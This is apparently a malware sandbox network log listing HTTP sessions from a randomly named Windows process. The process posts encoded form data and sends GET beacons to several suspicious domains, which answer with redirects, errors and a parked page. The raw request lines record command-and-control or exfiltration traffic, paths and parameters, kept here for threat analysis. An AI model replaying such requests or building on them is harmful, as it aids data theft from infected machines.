                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5oGfUtiZ0uu7GZOeWqArkwm1nPdYSJhNuTqVgktFB5pNgVZZya2fKjWv//YBCsaSeDK8llg+l8/8QfY4myu96KhaXxe3YUy88RpYrgNO331kazwJHPlI6YAOjpq7kWofvE3wfSsYfPEpHdUvTeAyYDhEZxRhfEqN4FhjrW0aN3Zx5B3FwfYruUw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49802 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:12.360245943 CEST | 831 | OUT | POST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5pmvUrBh0nu7BWueWzQr/wm5nPcNfJzZuTLFgicFB8pNgNpZNHGf7jXTZ/YtCsaWeDPAllR+i9v8ST4448O96KhaXxeSDUy08R5orioy0plkZjgJHZlJ9YAOBprnOWuTvE1ofS5kYVUpFX0udQVSUbz00wSVfL6RwJXuxLGup0KtLFH8Ydaq1J6uLmpHloROtjdBqYFOLuEY=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49803 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:15.000437975 CEST | 5156 | OUT | POST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-= [TRUNCATED]
Oct 23, 2024 18:54:15.000549078 CEST | 2824 | OUT |
                                                                                                                                                                                                                        Data Ascii: NwXT7B22dQiPCrMeIsFqMzEPGZWLi8EzDBxUy7Jqm06ZbOuGNmWWlsKqBDYtuiB4NfV555rFA2cAuAz3S3olzR9cSROd7dTT8il+4NeGSVfqyr171znNXQS6gDpPwtoripsZWri+LHfzL+yeib2ZaCvW7c+C9BH0ufptAerp+Bstr9LkocKFl/kb2wTjDK/8wg+uRwydSW73ZL3E23ezBA/c4izlgNI54ttxEPzcSzthSzV7mDq


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49804 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:17.638305902 CEST | 536 | OUT | GET /2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:54:17.741117954 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:17 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49805 | 162.241.63.77 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:23.046096087 CEST | 817 | OUT | POST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1Skkl9ZqIzk5UIYKIShZuzzeRoydUgS1SKEx+FRkRpwgP9FCXruhINGF2kOfeuDs8ocRd+GQVuAQZKju/RcIXeATnIh9dRn4JQGa2uuwY0mDkRBpjDj+fr7ITxEDF5oGePeARwWDu2MS08Xw7s9kZqXAXZVsuBm6l/oR6wDewMmSnHjejkCwtYZ9w==
Oct 23, 2024 18:54:23.266845942 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:23 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
Oct 23, 2024 18:54:23.266864061 CEST | 277 | IN |


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49806 | 162.241.63.77 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:25.701554060 CEST | 837 | OUT | POST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1SkmENZorrkuEIbAoShXOz3eRkydVU81hiExaJRjQpwhP9FanqkuoNdF2pzfauDs88cRf2GXmGDfpKb1vRSG3eATnIh9cxB4JIGGXeu/Z0lOERehDDjsvr3ITw+DG9OGYLeAQAWA8ePY08R07thl4PBAUtZl5k/93jSUs9ZDC4CR0bRaTdqyvZCg7CRQqnIZxexqXd1OHG2QfA=
Oct 23, 2024 18:54:25.913273096 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:25 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
Oct 23, 2024 18:54:25.913285971 CEST | 277 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49807 | 162.241.63.77 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:28.359085083 CEST | 1289 | OUT | POST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:54:28.359146118 CEST | 5156 | OUT
Oct 23, 2024 18:54:28.359201908 CEST | 1541 | OUT
Oct 23, 2024 18:54:28.584069967 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:28 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
Oct 23, 2024 18:54:28.584088087 CEST | 277 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49808 | 162.241.63.77 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:31.010822058 CEST | 538 | OUT | GET /65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g= HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:54:31.253310919 CEST | 571 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:31 GMT
                                                                                                                                                                                                                        Server: nginx/1.23.4
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                                        Location: http://estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g=
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        X-Server-Cache: true
                                                                                                                                                                                                                        X-Proxy-Cache: MISS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49809 | 185.134.245.113 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:41.588176012 CEST | 823 | OUT | POST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUC0GTlqeAgXdINbxJgr5x7hxymuoJpoce2+4QceZpPCOQLxmOo+GiIK/uW6mxNeBxWPHnAg74iNk2TR8fvvEbDll1PRY/14QVD+JmUY+NqI7YaJ8IAhyp9VqwssvsSiBbUwrzFkDYCbathMXbypdHryVqapUoXOwpYxR5Y4kEF3VZs0NlDMQktg==
Oct 23, 2024 18:54:41.784852028 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:41 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49810 | 185.134.245.113 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:44.328823090 CEST | 843 | OUT | POST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUCRWT25GAn3dLUrxJu7517h9ymvsjp6oe4/IQffZpMCOQTBmB1OGpIKiRW7axNeFxWKjnAXn5wNkwVR8BrvEbDll1PRNq14oVDO5mV9SOjo7bZJ8IXRy19VqSsvrKSg5bUxbzAm7XR7avlMWYkqo2yjteK5MhetIGUHcjFKQgGkJroE0NBOR/wieFCPiA2B0h1UgoNxFsWco=
Oct 23, 2024 18:54:44.531461000 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:44 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49811 | 185.134.245.113 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:47.054519892 CEST | 2578 | OUT | POST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-= [TRUNCATED]
Oct 23, 2024 18:54:47.054554939 CEST | 5156 | OUT
                                                                                                                                                                                                                        Data Ascii: qwmkuJb2soTRkfEIe2xyz5G3XpiB0EHpKHdSOWF/lWYWWC4nibj+cip062FTDMjG9RdCyexedylMdEsYBsklC16/p1Op+44vXJnwH1ubZu8ZYXqR1Qjg4xNZyJ8vGB8uEZUuaC4kDO63nnCLI8auiqWNeKp8MRJk6FK07IY4E0Nd8Uu3dsGGa0DYkFFWLQDCT9tnFmLbf0FidGs+LhiURalOOJSh3Wceq8uJcemdw51W86MGrkD
Oct 23, 2024 18:54:47.054627895 CEST | 258 | OUT
                                                                                                                                                                                                                        Data Ascii: H5alGRD1CdLy/05JDGOesv7W/PF4qVvwJGfQ7+Wra1We+1pBl7+x7D35ZNyl9b8Q8aJgcdJlR8KK8gvIajcE+DzKLUcWIN6dZzCceTQDOw6rIrk2F6vS2fwFZv39umOo9SBvl9rUEfTVwgD02uvOPGMUynhLPy5papFw2ktg17RZpXLXdCm9UAYzsLN8IanEG6qoiBhR0igkKowKbBBdG0mEFGv5XzjbLVZ1H4HPGvl/HY8IJAl
Oct 23, 2024 18:54:47.245516062 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49812 | 185.134.245.113 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:49.771640062 CEST | 540 | OUT | GET /13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:54:49.965287924 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:49 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 17:54:49 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                                        Data Ascii: 154a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.russe-trykk.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
Oct 23, 2024 18:54:49.965363026 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { positi
Oct 23, 2024 18:54:49.965409994 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: ref="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.russe-trykk.online') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vre aktivt brukt
Oct 23, 2024 18:54:49.965478897 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: <div class="container"> <h1 id="t"> www.russe-trykk.online is parked </h1> <p id="m"> www.russe-trykk.online is registered, but the owner currently does not have an active website
Oct 23, 2024 18:54:49.965518951 CEST | 565 | IN
                                                                                                                                                                                                                        Data Ascii: >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 42719508f6e23ba304db43dec0360e0f/parkedweb01 </span> </div> <script> q("ls").setAttribute("style", ""); fun


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49813 | 172.67.148.133 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
